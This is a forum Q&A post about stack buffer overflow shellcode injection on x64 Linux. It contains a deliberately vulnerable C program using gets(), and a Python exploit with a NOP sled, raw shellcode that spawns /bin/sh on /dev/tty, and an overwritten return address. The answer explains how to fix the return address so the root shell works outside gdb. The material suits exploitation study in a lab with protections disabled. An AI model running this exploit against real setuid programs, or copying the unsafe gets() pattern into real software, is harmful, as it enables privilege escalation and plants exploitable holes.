x64 linux 上的 Shellcode 注入

Question

I'm facing a problem while trying to inject shellcode into a program through a buffer overflow on a 64bit. I already disabled ASLR and compiled without stack cookies and with execstack.

// vuln.c
#include <stdio.h>

void vuln()
{
        printf("Give me something to worry about...\n");

        char buf[500];
        gets(buf);

        printf("No root shell for you...\n");
}

int main()
{
    vuln();
}

# exp.py
from struct import pack

payload_len = 520
nop = "\x90"*300
# Address in the middle of the nop stack
rip = 0x7fffffffdf4c

buf = ""
buf += "\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05"
buf += "\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05"
buf += "\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05"

buf_len = len(buf)
nop_len = len(nop)
padding = "A"*(payload_len-nop_len-buf_len)

payload = nop + buf + padding + pack("<Q", rip)

print payload

Basically the exploit only works while running in gdb (I'm able to start a shell) but not on the command line. I figured it could be because a closed pipe so I tried the cat trick by doing (python exp.py; cat) |./vuln but it didn't help. Obviously doing the exploit in gdb doesn't allow to escalate privileges. Does someone know what I'm doing wrong?

Thanks in advance.

Answer 1

Apparently the address I got with gdb ( rip = 0x7fffffffdf4c ) was too close to the beginning of the buffer and when executing from the command line execution was redirected to invalid memory (I guess the stack was shifted down slightly compared to executing using gdb). By choosing an address further down in the NOP slide everything works as expected.